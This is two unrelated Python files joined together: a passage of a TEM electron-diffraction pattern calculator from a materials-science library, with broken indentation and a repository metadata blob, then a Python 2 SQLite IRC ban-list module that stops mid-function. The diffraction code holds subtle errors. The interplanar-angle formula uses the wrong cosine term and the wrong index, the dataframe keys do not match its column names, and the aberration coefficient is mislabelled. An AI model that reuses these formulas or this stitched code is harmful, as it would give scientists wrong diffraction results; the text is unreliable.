Computes the TEM pattern of a crystal structure for multiple Laue zones.
Code partially inspired from XRD calculation implementation. X-ray factor to electron factor
conversion based on the International Table of Crystallography.
#TODO: Could add "number of iterations", "magnification", "critical value of beam",
"twin direction" for certain materials, "sample thickness", and "excitation error s"
"""
    def __init__(
        self,
        symprec: float = None,
        voltage: float = 200,
        beam_direction: Tuple[int, int, int] = (0, 0, 1),
        camera_length: int = 160,
        debye_waller_factors: Dict[str, float] = None,
        cs: float = 1,
    ) -> None:
        """
        Args:
            symprec (float): Symmetry precision for structure refinement. If
                set to 0, no refinement is done. Otherwise, refinement is
                performed using spglib with provided precision.
            voltage (float): The wavelength is a function of the TEM microscope's
                voltage. By default, set to 200 kV. Units in kV.
            beam_direction (tuple): The direction of the electron beam fired onto the sample.
                By default, set to [0,0,1], which corresponds to the normal direction
                of the sample plane.
            camera_length (int): The distance from the sample to the projected diffraction pattern.
                By default, set to 160 cm. Units in cm.
            debye_waller_factors ({element symbol: float}): Allows the
                specification of Debye-Waller factors. Note that these
                factors are temperature dependent.
            cs (float): the chromatic aberration coefficient. set by default to 1 mm.
        """
        self.symprec = symprec
        self.voltage = voltage  # kV
        self.beam_direction = beam_direction
        self.camera_length = camera_length  # cm
        # Default to an empty mapping so lookups never hit None.
        # NOTE(review): stored but not consumed by any method visible in this
        # portion of the module -- verify where these factors are applied.
        self.debye_waller_factors = debye_waller_factors or {}
        self.cs = cs  # mm
@lru_cache(1)
def wavelength_rel(self) -> float:
"""
Calculates the wavelength of the electron beam with relativistic kinematic effects taken
into account.
Args:
none
Returns:
Relativistic Wavelength (in angstroms)
"""
wavelength_rel = (
sc.h
/ np.sqrt(
2 * sc.m_e * sc.e * 1000 * self.voltage * (1 + (sc.e * 1000 * self.voltage) / (2 * sc.m_e * sc.c ** 2))
)
* (10 ** 10)
)
return wavelength_rel
@staticmethod
def generate_points(coord_left: int = -10, coord_right: int = 10) -> np.ndarray:
"""
Generates a bunch of 3D points that span a cube.
Args:
coord_left (int): The minimum coordinate value.
coord_right (int): The maximum coordinate value.
Returns:
Numpy 2d array
"""
points = [0, 0, 0]
coord_values = np.arange(coord_left, coord_right + 1)
points[0], points[1], points[2] = np.meshgrid(coord_values, coord_values, coord_values)
points_matrix = (np.ravel(points[i]) for i in range(0, 3))
result = np.vstack(list(points_matrix)).transpose()
return result
def zone_axis_filter(
self, points: Union[List[Tuple[int, int, int]], np.ndarray], laue_zone: int = 0
) -> Union[List[Tuple[int, int, int]]]:
"""
Filters out all points that exist within the specified Laue zone according to the zone axis rule.
Args:
points (np.ndarray): The list of points to be filtered.
laue_zone (int): The desired Laue zone.
Returns:
list of 3-tuples
"""
if any(isinstance(n, tuple) for n in points):
return list(points)
if len(points) == 0:
return []
filtered = np.where(np.dot(np.array(self.beam_direction), np.transpose(points)) == laue_zone)
result = points[filtered]
result_tuples = cast(List[Tuple[int, int, int]], [tuple(x) for x in result.tolist()])
return result_tuples
def get_interplanar_spacings(
self, structure: Structure, points: Union[List[Tuple[int, int, int]], np.ndarray]
) -> Dict[Tuple[int, int, int], float]:
"""
Args:
structure (Structure): the input structure.
points (tuple): the desired hkl indices.
Returns:
Dict of hkl to its interplanar spacing, in angstroms (float).
"""
points_filtered = self.zone_axis_filter(points)
if (0, 0, 0) in points_filtered:
points_filtered.remove((0, 0, 0))
interplanar_spacings_val = np.array(list(map(lambda x: structure.lattice.d_hkl(x), points_filtered)))
interplanar_spacings = dict(zip(points_filtered, interplanar_spacings_val))
return interplanar_spacings
def bragg_angles(
self, interplanar_spacings: Dict[Tuple[int, int, int], float]
) -> Dict[Tuple[int, int, int], float]:
"""
Gets the Bragg angles for every hkl point passed in (where n = 1).
Args:
interplanar_spacings (dict): dictionary of hkl to interplanar spacing
Returns:
dict of hkl plane (3-tuple) to Bragg angle in radians (float)
"""
plane = list(interplanar_spacings.keys())
interplanar_spacings_val = np.array(list(interplanar_spacings.values()))
bragg_angles_val = np.arcsin(self.wavelength_rel() / (2 * interplanar_spacings_val))
bragg_angles = dict(zip(plane, bragg_angles_val))
return bragg_angles
def get_s2(self, bragg_angles: Dict[Tuple[int, int, int], float]) -> Dict[Tuple[int, int, int], float]:
"""
Calculates the s squared parameter (= square of sin theta over lambda) for each hkl plane.
Args:
bragg_angles (Dict): The bragg angles for each hkl plane.
Returns:
Dict of hkl plane to s2 parameter, calculates the s squared parameter
(= square of sin theta over lambda).
"""
plane = list(bragg_angles.keys())
bragg_angles_val = np.array(list(bragg_angles.values()))
s2_val = (np.sin(bragg_angles_val) / self.wavelength_rel()) ** 2
s2 = dict(zip(plane, s2_val))
return s2
def x_ray_factors(
self, structure: Structure, bragg_angles: Dict[Tuple[int, int, int], float]
) -> Dict[str, Dict[Tuple[int, int, int], float]]:
"""
Calculates x-ray factors, which are required to calculate atomic scattering factors. Method partially inspired
by the equivalent process in the xrd module.
Args:
structure (Structure): The input structure.
bragg_angles (Dict): Dictionary of hkl plane to Bragg angle.
Returns:
dict of atomic symbol to another dict of hkl plane to x-ray factor (in angstroms).
"""
x_ray_factors = {}
s2 = self.get_s2(bragg_angles)
atoms = structure.composition.elements
scattering_factors_for_atom = {}
for atom in atoms:
coeffs = np.array(ATOMIC_SCATTERING_PARAMS[atom.symbol])
for plane in bragg_angles:
scattering_factor_curr = atom.Z - 41.78214 * s2[plane] * np.sum(
coeffs[:, 0] * np.exp(-coeffs[:, 1] * s2[plane]), axis=None
)
scattering_factors_for_atom[plane] = scattering_factor_curr
x_ray_factors[atom.symbol] = scattering_factors_for_atom
scattering_factors_for_atom = {}
return x_ray_factors
def electron_scattering_factors(
self, structure: Structure, bragg_angles: Dict[Tuple[int, int, int], float]
) -> Dict[str, Dict[Tuple[int, int, int], float]]:
"""
Calculates atomic scattering factors for electrons using the Mott-Bethe formula (1st order Born approximation).
Args:
structure (Structure): The input structure.
bragg_angles (dict of 3-tuple to float): The Bragg angles for each hkl plane.
Returns:
dict from atomic symbol to another dict of hkl plane to factor (in angstroms)
"""
electron_scattering_factors = {}
x_ray_factors = self.x_ray_factors(structure, bragg_angles)
s2 = self.get_s2(bragg_angles)
atoms = structure.composition.elements
prefactor = 0.023934
scattering_factors_for_atom = {}
for atom in atoms:
for plane in bragg_angles:
scattering_factor_curr = prefactor * (atom.Z - x_ray_factors[atom.symbol][plane]) / s2[plane]
scattering_factors_for_atom[plane] = scattering_factor_curr
electron_scattering_factors[atom.symbol] = scattering_factors_for_atom
scattering_factors_for_atom = {}
return electron_scattering_factors
def cell_scattering_factors(
self, structure: Structure, bragg_angles: Dict[Tuple[int, int, int], float]
) -> Dict[Tuple[int, int, int], int]:
"""
Calculates the scattering factor for the whole cell.
Args:
structure (Structure): The input structure.
bragg_angles (dict of 3-tuple to float): The Bragg angles for each hkl plane.
Returns:
dict of hkl plane (3-tuple) to scattering factor (in angstroms).
"""
cell_scattering_factors = {}
electron_scattering_factors = self.electron_scattering_factors(structure, bragg_angles)
scattering_factor_curr = 0
for plane in bragg_angles:
for site in structure:
for sp, occu in site.species.items():
g_dot_r = np.dot(np.array(plane), np.transpose(site.frac_coords))
scattering_factor_curr += electron_scattering_factors[sp.symbol][plane] * np.exp(
2j * np.pi * g_dot_r
)
cell_scattering_factors[plane] = scattering_factor_curr
scattering_factor_curr = 0
return cell_scattering_factors
def cell_intensity(
self, structure: Structure, bragg_angles: Dict[Tuple[int, int, int], float]
) -> Dict[Tuple[int, int, int], float]:
"""
Calculates cell intensity for each hkl plane. For simplicity's sake, take I = |F|**2.
Args:
structure (Structure): The input structure.
bragg_angles (dict of 3-tuple to float): The Bragg angles for each hkl plane.
Returns:
dict of hkl plane to cell intensity
"""
csf = self.cell_scattering_factors(structure, bragg_angles)
plane = bragg_angles.keys()
csf_val = np.array(list(csf.values()))
cell_intensity_val = (csf_val * csf_val.conjugate()).real
cell_intensity = dict(zip(plane, cell_intensity_val))
return cell_intensity
def get_pattern(
self,
structure: Structure,
scaled: bool = None,
two_theta_range: Tuple[float, float] = None,
) -> pd.DataFrame:
"""
Returns all relevant TEM DP info in a pandas dataframe.
Args:
structure (Structure): The input structure.
scaled (boolean): Required value for inheritance, does nothing in TEM pattern
two_theta_range (Tuple): Required value for inheritance, does nothing in TEM pattern
Returns:
PandasDataFrame
"""
if self.symprec:
finder = SpacegroupAnalyzer(structure, symprec=self.symprec)
structure = finder.get_refined_structure()
points = self.generate_points(-10, 11)
tem_dots = self.tem_dots(structure, points)
field_names = [
"Position",
"(hkl)",
"Intensity (norm)",
"Film radius",
"Interplanar Spacing",
]
rows_list = []
for dot in tem_dots:
dict1 = {
"Pos": dot.position,
"(hkl)": dot.hkl,
"Intnsty (norm)": dot.intensity,
"Film rad": dot.film_radius,
"Interplanar Spacing": dot.d_spacing,
}
rows_list.append(dict1)
df = pd.DataFrame(rows_list, columns=field_names)
return df
def normalized_cell_intensity(
self, structure: Structure, bragg_angles: Dict[Tuple[int, int, int], float]
) -> Dict[Tuple[int, int, int], float]:
"""
Normalizes the cell_intensity dict to 1, for use in plotting.
Args:
structure (Structure): The input structure.
bragg_angles (dict of 3-tuple to float): The Bragg angles for each hkl plane.
Returns:
dict of hkl plane to normalized cell intensity
"""
normalized_cell_intensity = {}
cell_intensity = self.cell_intensity(structure, bragg_angles)
max_intensity = max(cell_intensity.values())
norm_factor = 1 / max_intensity
for plane in cell_intensity:
normalized_cell_intensity[plane] = cell_intensity[plane] * norm_factor
return normalized_cell_intensity
def is_parallel(
self,
structure: Structure,
plane: Tuple[int, int, int],
other_plane: Tuple[int, int, int],
) -> bool:
"""
Checks if two hkl planes are parallel in reciprocal space.
Args:
structure (Structure): The input structure.
plane (3-tuple): The first plane to be compared.
other_plane (3-tuple): The other plane to be compared.
Returns:
boolean
"""
phi = self.get_interplanar_angle(structure, plane, other_plane)
return phi in (180, 0) or np.isnan(phi)
def get_first_point(self, structure: Structure, points: list) -> Dict[Tuple[int, int, int], float]:
"""
Gets the first point to be plotted in the 2D DP, corresponding to maximum d/minimum R.
Args:
structure (Structure): The input structure.
points (list): All points to be checked.
Returns:
dict of a hkl plane to max interplanar distance.
"""
max_d = -100.0
max_d_plane = (0, 0, 1)
points = self.zone_axis_filter(points)
spacings = self.get_interplanar_spacings(structure, points)
for plane in sorted(spacings.keys()):
if spacings[plane] > max_d:
max_d_plane = plane
max_d = spacings[plane]
return {max_d_plane: max_d}
@staticmethod
def get_interplanar_angle(structure: Structure, p1: Tuple[int, int, int], p2: Tuple[int, int, int]) -> float:
"""
Returns the interplanar angle (in degrees) between the normal of two crystal planes.
Formulas from International Tables for Crystallography Volume C pp. 2-9.
Args:
structure (Structure): The input structure.
p1 (3-tuple): plane 1
p2 (3-tuple): plane 2
Returns:
float
"""
a, b, c = structure.lattice.a, structure.lattice.b, structure.lattice.c
alpha, beta, gamma = (
np.deg2rad(structure.lattice.alpha),
np.deg2rad(structure.lattice.beta),
np.deg2rad(structure.lattice.gamma),
)
v = structure.lattice.volume
a_star = b * c * np.sin(alpha) / v
b_star = a * c * np.sin(beta) / v
c_star = a * b * np.sin(gamma) / v
cos_alpha_star = (np.cos(beta) * np.cos(gamma) - np.cos(alpha)) / (np.sin(beta) * np.sin(gamma))
cos_beta_star = (np.cos(alpha) * np.cos(gamma) - np.cos(beta)) / (np.sin(alpha) * np.sin(gamma))
cos_gamma_star = (np.cos(alpha) * np.cos(beta) - np.cos(gamma)) / (np.sin(alpha) * np.sin(beta))
r1_norm = np.sqrt(
p1[0] ** 2 * a_star ** 2
+ p1[1] ** 2 * b_star ** 2
+ p1[2] ** 2 * c_star ** 2
+ 2 * p1[0] * p1[1] * a_star * b_star * cos_gamma_star
+ 2 * p1[0] * p1[2] * a_star * c_star * cos_beta_star
+ 2 * p1[1] * p1[2] * b_star * c_star * cos_gamma_star
)
r2_norm = np.sqrt(
p2[0] ** 2 * a_star ** 2
+ p2[1] ** 2 * b_star ** 2
+ p2[2] ** 2 * c_star ** 2
+ 2 * p2[0] * p2[1] * a_star * b_star * cos_gamma_star
+ 2 * p2[0] * p2[2] * a_star * c_star * cos_beta_star
+ 2 * p2[1] * p2[2] * b_star * c_star * cos_gamma_star
)
r1_dot_r2 = (
p1[0] * p2[0] * a_star ** 2
+ p1[1] * p2[1] * b_star ** 2
+ p1[2] * p2[2] * c_star ** 2
+ (p1[0] * p2[1] + p2[0] * p1[1]) * a_star * b_star * cos_gamma_star
+ (p1[0] * p2[2] + p2[0] * p1[1]) * a_star * c_star * cos_beta_star
+ (p1[1] * p2[2] + p2[1] * p1[2]) * b_star * c_star * cos_alpha_star
)
phi = np.arccos(r1_dot_r2 / (r1_norm * r2_norm))
return np.rad2deg(phi)
@staticmethod
def get_plot_coeffs(
p1: Tuple[int, int, int],
p2: Tuple[int, int, int],
p3: Tuple[int, int, int],
) -> np.ndarray:
"""
Calculates coefficients of the vector addition required to generate positions for each DP point
by the Moore-Penrose inverse method.
Args:
p1 (3-tuple): The first point. Fixed.
p2 (3-tuple): The second point. Fixed.
p3 (3-tuple): The point whose coefficients are to be calculted.
Returns:
Numpy array
"""
a = np.array([[p1[0], p2[0]], [p1[1], p2[1]], [p1[2], p2[2]]])
b = np.array([[p3[0], p3[1], p3[2]]]).T
a_pinv = np.linalg.pinv(a)
x = np.dot(a_pinv, b)
return np.ravel(x)
    def get_positions(self, structure: Structure, points: list) -> Dict[Tuple[int, int, int], np.ndarray]:
        """
        Calculates all the positions of each hkl point in the 2D diffraction pattern by vector addition.
        Distance in centimeters.

        Note: temporarily mutates the filtered `points` list (removes the two
        anchor planes and (0,0,0)), then re-appends them before returning.

        Args:
            structure (Structure): The input structure.
            points (list): All points to be checked.

        Returns:
            dict of hkl plane to xy-coordinates.
        """
        positions = {}
        points = self.zone_axis_filter(points)
        # first is the max_d, min_r
        first_point_dict = self.get_first_point(structure, points)
        for point, v in first_point_dict.items():
            first_point = point
            first_d = v
        spacings = self.get_interplanar_spacings(structure, points)
        # second is the first non-parallel-to-first-point vector when sorted.
        # note 000 is "parallel" to every plane vector.
        for plane in sorted(spacings.keys()):
            second_point, second_d = plane, spacings[plane]
            if not self.is_parallel(structure, first_point, second_point):
                break
        p1 = first_point
        p2 = second_point
        # The two anchors and the direct beam get explicit positions; remove
        # them so the general loop below only handles the remaining planes.
        if (0, 0, 0) in points:
            points.remove((0, 0, 0))
        points.remove(first_point)
        points.remove(second_point)
        positions[(0, 0, 0)] = np.array([0, 0])
        # distance from the direct beam scales as wavelength * camera_length / d
        r1 = self.wavelength_rel() * self.camera_length / first_d
        positions[first_point] = np.array([r1, 0])
        r2 = self.wavelength_rel() * self.camera_length / second_d
        # place the second anchor at the interplanar angle from the first
        phi = np.deg2rad(self.get_interplanar_angle(structure, first_point, second_point))
        positions[second_point] = np.array([r2 * np.cos(phi), r2 * np.sin(phi)])
        # every other point is a linear combination of the two anchor positions
        for plane in points:
            coeffs = self.get_plot_coeffs(p1, p2, plane)
            pos = np.array(
                [
                    coeffs[0] * positions[first_point][0] + coeffs[1] * positions[second_point][0],
                    coeffs[0] * positions[first_point][1] + coeffs[1] * positions[second_point][1],
                ]
            )
            positions[plane] = pos
        # restore the removed entries (order may differ from the input)
        points.append((0, 0, 0))
        points.append(first_point)
        points.append(second_point)
        return positions
def tem_dots(self, structure: Structure, points) -> List:
"""
Generates all TEM_dot as named tuples that will appear on the 2D diffraction pattern.
Args:
structure (Structure): The input structure.
points (list): All points to be checked.
Returns:
list of TEM_dots
"""
dots = []
interplanar_spacings = self.get_interplanar_spacings(structure, points)
bragg_angles = self.bragg_angles(interplanar_spacings)
cell_intensity = self.normalized_cell_intensity(structure, bragg_angles)
positions = self.get_positions(structure, points)
for hkl, intensity in cell_intensity.items():
dot = namedtuple("dot", ["position", "hkl", "intensity", "film_radius", "d_spacing"])
position = positions[hkl]
film_radius = 0.91 * (10 ** -3 * self.cs * self.wavelength_rel() ** 3) ** Fraction("1/4")
d_spacing = interplanar_spacings[hkl]
tem_dot = dot(position, hkl, intensity, film_radius, d_spacing)
dots.append(tem_dot)
return dots
def get_plot_2d(self, structure: Structure) -> go.Figure:
    """
    Generates the 2D diffraction pattern of the input structure.

    Args:
        structure (Structure): The input structure.

    Returns:
        Figure: plotly figure with the diffraction spots drawn as
        intensity-shaded markers on a black background, plus the
        (0, 0, 0) direct beam drawn separately in white.
    """
    if self.symprec:
        # Optionally refine the structure to its symmetrized form first.
        finder = SpacegroupAnalyzer(structure, symprec=self.symprec)
        structure = finder.get_refined_structure()
    points = self.generate_points(-10, 11)
    tem_dots = self.tem_dots(structure, points)
    xs = []
    ys = []
    hkls = []
    intensities = []
    for dot in tem_dots:
        xs.append(dot.position[0])
        ys.append(dot.position[1])
        hkls.append(str(dot.hkl))
        intensities.append(dot.intensity)
    # Pretty-print hkl labels (LaTeX then unicode) for the hover text.
    hkls = list(map(unicodeify_spacegroup, list(map(latexify_spacegroup, hkls))))
    data = [
        go.Scatter(
            x=xs,
            y=ys,
            text=hkls,
            hoverinfo="text",
            mode="markers",
            marker=dict(
                size=8,
                cmax=1,
                cmin=0,
                color=intensities,
                # Intensity 0 renders black (invisible on the black
                # plot background), 1 renders white.
                colorscale=[[0, "black"], [1.0, "white"]],
            ),
            showlegend=False,
        ),
        # Direct beam drawn as its own trace: always white, larger marker.
        go.Scatter(
            x=[0],
            y=[0],
            text="(0, 0, 0): Direct beam",
            hoverinfo="text",
            mode="markers",
            marker=dict(size=14, cmax=1, cmin=0, color="white"),
            showlegend=False,
        ),
    ]
    layout = go.Layout(
        title="2D Diffraction Pattern<br>Beam Direction: " + "".join(str(e) for e in self.beam_direction),
        font=dict(size=14, color="#7f7f7f"),
        hovermode="closest",
        # Axes hidden entirely: the plot mimics a TEM film plate.
        xaxis=dict(
            range=[-4, 4],
            showgrid=False,
            zeroline=False,
            showline=False,
            ticks="",
            showticklabels=False,
        ),
        yaxis=dict(
            range=[-4, 4],
            showgrid=False,
            zeroline=False,
            showline=False,
            ticks="",
            showticklabels=False,
        ),
        width=550,
        height=550,
        paper_bgcolor="rgba(100,110,110,0.5)",
        plot_bgcolor="black",
    )
    fig = go.Figure(data=data, layout=layout)
    return fig
def get_plot_2d_concise(self, structure: Structure) -> go.Figure:
    """
    Generates the concise 2D diffraction pattern of the input structure of a smaller size and without layout.
    Does not display.

    Args:
        structure (Structure): The input structure.

    Returns:
        Figure: thumbnail-sized (121x121 px) plotly figure with no hover
        text, no axes and no direct-beam marker.
    """
    if self.symprec:
        # Optionally refine the structure to its symmetrized form first.
        finder = SpacegroupAnalyzer(structure, symprec=self.symprec)
        structure = finder.get_refined_structure()
    points = self.generate_points(-10, 11)
    tem_dots = self.tem_dots(structure, points)
    xs = []
    ys = []
    hkls = []
    intensities = []
    for dot in tem_dots:
        # Unlike get_plot_2d, the direct beam is skipped here.
        if dot.hkl != (0, 0, 0):
            xs.append(dot.position[0])
            ys.append(dot.position[1])
            hkls.append(dot.hkl)
            intensities.append(dot.intensity)
    data = [
        go.Scatter(
            x=xs,
            y=ys,
            text=hkls,
            mode="markers",
            hoverinfo="skip",
            marker=dict(
                size=4,
                cmax=1,
                cmin=0,
                color=intensities,
                colorscale=[[0, "black"], [1.0, "white"]],
            ),
            showlegend=False,
        )
    ]
    layout = go.Layout(
        xaxis=dict(
            range=[-4, 4],
            showgrid=False,
            zeroline=False,
            showline=False,
            ticks="",
            showticklabels=False,
        ),
        yaxis=dict(
            range=[-4, 4],
            showgrid=False,
            zeroline=False,
            showline=False,
            ticks="",
            showticklabels=False,
        ),
        plot_bgcolor="black",
        margin={"l": 0, "r": 0, "t": 0, "b": 0},
        width=121,
        height=121,
    )
    fig = go.Figure(data=data, layout=layout)
    fig.layout.update(showlegend=False)
    return fig
| {
"content_hash": "018447ddfd4a7df6ccabac32cc7a0969",
"timestamp": "",
"source": "github",
"line_count": 660,
"max_line_length": 119,
"avg_line_length": 40.722727272727276,
"alnum_prop": 0.555307511999107,
"repo_name": "gmatteo/pymatgen",
"id": "901a0acd84727cba89a4c846ed8cedc4539daf34",
"size": "27053",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pymatgen/analysis/diffraction/tem.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "277"
},
{
"name": "Python",
"bytes": "7840569"
},
{
"name": "Shell",
"bytes": "711"
}
],
"symlink_target": ""
} |
import sqlite3
import re
from cStringIO import StringIO  # Python 2 module; this file targets Python 2.

# Whitelists of characters accepted in the components of an IRC
# nick!ident@host mask (enforced by BanList.__createString_forSQL__).
# NOTE(review): `re` is imported but not referenced in this portion of
# the file -- confirm before removing.
ALLOWEDCHARS = '-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}'
# Idents may additionally contain "~".
ALLOWEDCHARS_IDENT = ALLOWEDCHARS+"~"
# Hosts may additionally contain ":" and ".".
ALLOWEDCHARS_HOST = ALLOWEDCHARS + ":."
class InvalidCharacterUsed(Exception):
    """Raised when a string contains a character outside the allowed set.

    Carries the offending string, the character itself, and its index.
    """

    def __init__(self, string, char, pos):
        self.string = string
        self.char = char
        self.pos = pos

    def __str__(self):
        return "String contains invalid character {0} on position {1}".format(
            hex(ord(self.char)), self.pos
        )
class NoSuchBanGroup(Exception):
def __init__(self, group_name):
self.group = group_name
def __str__(self):
return "No such ban group exists: '{0}'".format(self.group)
class BanList:
    """SQLite-backed IRC ban list with named ban groups.

    Ban patterns are stored as SQLite GLOB expressions and matched
    against lowercased ``nick!ident@host`` strings.  A "Global" group is
    always defined; any other group must be created via defineGroup()
    before it can be used, which guards against banning into a group
    that does not exist.
    """

    def __init__(self, filename):
        # User input may escape "[" or "]" with "/"; in the stored GLOB
        # pattern a literal bracket is represented as a "[x]" class.
        self.ESCAPESTRING = "/"
        self.ESCAPE = "[]"
        # GLOB wildcards that must keep their special meaning.
        self.NOT_ESCAPE = "*?!^"
        self.conn = sqlite3.connect(filename)
        self.cursor = self.conn.cursor()
        # Create table for bans
        self.cursor.execute("""
        CREATE TABLE IF NOT EXISTS Banlist(groupName TEXT, pattern TEXT,
        ban_reason TEXT,
        timestamp INTEGER, banlength INTEGER
        )
        """)
        # Create table for the names of the ban groups.
        # This will be used to check if a group exists
        # when checking if a user is banned in that group.
        self.cursor.execute("""
        CREATE TABLE IF NOT EXISTS Bangroups(groupName TEXT)
        """)
        self.defineGroup("Global")

    # You need to define a group name if you want
    # to have your own ban groups.
    # This should prevent accidents in which an user
    # is banned in a group that doesn't exist.
    def defineGroup(self, groupName):
        """Create a ban group.

        Returns True when a new group was created, False when the group
        already existed.
        """
        doesExist = self.__groupExists__(groupName)
        if not doesExist:
            self.cursor.execute("""
            INSERT INTO Bangroups(groupName)
            VALUES (?)
            """, (groupName, ))
            self.conn.commit()
            # True means that a new group has been defined.
            return True
        # False means that no new group has been defined, i.e.
        # the group already exists.
        return False

    def banUser(self, user, ident="*", host="*", groupName="Global",
                ban_reason="None",
                timestamp=(-1), banlength=(-1)):
        """Ban a user pattern in *groupName*.

        Returns True when the pattern was added, False when it was
        already banned.  Raises NoSuchBanGroup for an unknown group and
        InvalidCharacterUsed for disallowed characters.
        """
        banstring = self.__assembleBanstring__(user, ident, host).lower()
        if not self.__groupExists__(groupName):
            raise NoSuchBanGroup(groupName)
        if not self.__banExists__(groupName, banstring):
            self.__ban__(banstring, groupName, ban_reason, timestamp, banlength)
            # The operation was successful, we banned the pattern.
            return True
        else:
            # We did not ban the pattern because it was already banned.
            return False

    def unbanUser(self, user, ident="*", host="*",
                  groupName="Global"):
        """Remove a ban from *groupName*.

        Returns True when a pattern was removed, False when it was not
        banned in the first place.  Raises NoSuchBanGroup for an
        unknown group.
        """
        banstring = self.__assembleBanstring__(user, ident, host).lower()
        if not self.__groupExists__(groupName):
            raise NoSuchBanGroup(groupName)
        if self.__banExists__(groupName, banstring):
            self.__unban__(banstring, groupName)
            # The operation was successful, the pattern was unbanned.
            return True
        else:
            # We did not unban the pattern because it was never banned
            # in the first place.
            return False

    def clearBanlist_all(self):
        """Delete every ban in every group."""
        self.cursor.execute("""
        DELETE FROM Banlist
        """)
        self.conn.commit()

    def clearBanlist_group(self, groupName):
        """Delete every ban belonging to *groupName*."""
        self.cursor.execute("""
        DELETE FROM Banlist
        WHERE groupName = ?
        """, (groupName, ))
        self.conn.commit()

    def getBans(self, groupName=None, matchingString=None):
        """Return ban rows, optionally filtered.

        groupName restricts the result to one group (raises
        NoSuchBanGroup if undefined); matchingString is a hostmask
        matched (lowercased) against each stored GLOB pattern.
        """
        if groupName is None:
            if matchingString is None:
                self.cursor.execute("""
                SELECT * FROM Banlist
                """)
            else:
                self.cursor.execute("""
                SELECT * FROM Banlist
                WHERE ? GLOB pattern
                """, (matchingString.lower(), ))
            return self.cursor.fetchall()
        else:
            if self.__groupExists__(groupName):
                if matchingString is None:
                    self.cursor.execute("""
                    SELECT * FROM Banlist
                    WHERE groupName = ?
                    """, (groupName, ))
                else:
                    self.cursor.execute("""
                    SELECT * FROM Banlist
                    WHERE groupName = ? AND ? GLOB pattern
                    """, (groupName, matchingString.lower()))
                return self.cursor.fetchall()
            else:
                raise NoSuchBanGroup(groupName)

    def checkBan(self, user, ident, host,
                 groupName="Global"):
        """Check whether user!ident@host matches any ban in the group.

        Returns (True, matching_row) or (False, None).  Raises
        NoSuchBanGroup for an unknown group.
        """
        if not self.__groupExists__(groupName):
            raise NoSuchBanGroup(groupName)
        else:
            banstring = u"{0}!{1}@{2}".format(user, ident, host).lower()
            self.cursor.execute("""
            SELECT * FROM Banlist
            WHERE groupName = ? AND ? GLOB pattern
            """, (groupName, banstring))  # , self.ESCAPESTRING))
            result = self.cursor.fetchone()
            if result != None:
                return True, result
            else:
                return False, None

    def getGroups(self):
        """Return the list of all defined group names."""
        self.cursor.execute("""
        SELECT groupName FROM Bangroups
        """)
        groupTuples = self.cursor.fetchall()
        return [groupTuple[0] for groupTuple in groupTuples]

    def raw_ban(self, banstring, groupName, ban_reason, timestamp=(-1), banlength=(-1)):
        """Insert a pre-escaped pattern directly (no validation)."""
        self.__ban__(banstring, groupName, ban_reason, timestamp, banlength)

    def raw_unban(self, banstring, groupName):
        """Delete a pre-escaped pattern directly (no validation)."""
        self.__unban__(banstring, groupName)

    # We do the reverse of what __createString_forSQL__ is doing.
    # The result is a string which should be correct for using the
    # banUser and unbanUser methods, and the ban/unban commands.
    def unescape_banstring(self, banstring):
        """Convert a stored GLOB pattern back to user-input form."""
        finstring = StringIO()
        length = len(banstring)
        string_iter = enumerate(banstring)
        for pos, char in string_iter:
            charsLeft = length - pos - 1
            # NOTE(review): ">= 2" would already suffice to read the two
            # following characters; ">= 3" skips a "[x]" group that ends
            # the string -- confirm whether that is intentional.
            if char == "[" and charsLeft >= 3:
                nextchar = banstring[pos+1]
                closedBracket = banstring[pos+2]
                if closedBracket == "]":
                    finstring.write(nextchar)
                    # Consume the two characters we just emitted.
                    # (next() works on Python 2.6+ and 3, unlike .next())
                    next(string_iter)
                    next(string_iter)
                    continue
            if char in self.ESCAPE:
                finstring.write(self.ESCAPESTRING+char)
                continue
            finstring.write(char)
        return finstring.getvalue()

    def __regex_return_unescaped__(self, match):
        # Unimplemented placeholder; not referenced elsewhere in this
        # class.
        pass

    def __ban__(self, banstring, groupName="Global", ban_reason="None", timestamp=(-1), banlength=(-1)):
        self.cursor.execute("""
        INSERT INTO Banlist(groupName, pattern, ban_reason, timestamp, banlength)
        VALUES (?, ?, ?, ?, ?)
        """, (groupName, banstring, ban_reason, timestamp, banlength))
        self.conn.commit()

    def __unban__(self, banstring, groupName="Global"):
        self.cursor.execute("""
        DELETE FROM Banlist
        WHERE groupName = ? AND pattern = ?
        """, (groupName, banstring))
        self.conn.commit()

    def __banExists__(self, groupName, banstring):
        """Return True when the exact pattern is banned in the group."""
        self.cursor.execute("""
        SELECT 1 FROM Banlist
        WHERE groupName = ? AND pattern = ?
        """, (groupName, banstring))
        # Debug print of the fetched row removed: it flooded stdout on
        # every lookup.
        result = self.cursor.fetchone()
        if result != None and result[0] == 1:
            return True
        else:
            return False

    def __groupExists__(self, groupName):
        """Return True when *groupName* is a defined ban group."""
        self.cursor.execute("""
        SELECT 1 FROM Bangroups
        WHERE groupName = ?
        """, (groupName, ))
        result = self.cursor.fetchone()
        if result != None and result[0] == 1:
            return True
        else:
            return False

    def __stringIsValid__(self, string):
        # Simple whitelist check; not referenced elsewhere in this
        # class, kept for external callers.
        for char in string:
            if char not in ALLOWEDCHARS:
                return False
        return True

    def __assembleBanstring__(self, user, ident, host):
        """Escape the three components and join them as nick!ident@host."""
        escapedUser = self.__createString_forSQL__(user)
        escapedIdent = self.__createString_forSQL__(ident, ident=True)
        escapedHost = self.__createString_forSQL__(host, hostname=True)
        banstring = u"{0}!{1}@{2}".format(escapedUser, escapedIdent, escapedHost)
        return banstring

    # The createString_forSQL function takes a string and
    # formats it according to specific rules.
    # It also prevents characters that aren't in
    # the ALLOWEDCHARS constant to be used so that
    # characters not allowed in specific IRC arguments
    # (nickname, ident, host) appear in the string.
    #
    # It is not very specific and is only useful for
    # very simple filtering so that unicode characters
    # or special characters aren't used.
    def __createString_forSQL__(self, string, hostname=False, ident=False):
        """Validate *string* and convert it into a GLOB-safe pattern.

        Raises InvalidCharacterUsed when a character falls outside the
        whitelist for the chosen component type.
        """
        newString = StringIO()
        # Both flags should not be set at once.
        assert not ((hostname == True) and (ident == True))
        for pos, char in enumerate(string):
            # We try reverse-escaping:
            # - escaped chars will be written as literals
            # - non-escaped chars included in the escape string will be escaped
            # pos == 0 is an exception because characters at this
            # position cannot be escaped in any way that makes sense.
            if char == self.ESCAPESTRING:
                continue
            if char in self.NOT_ESCAPE:
                newString.write(char)
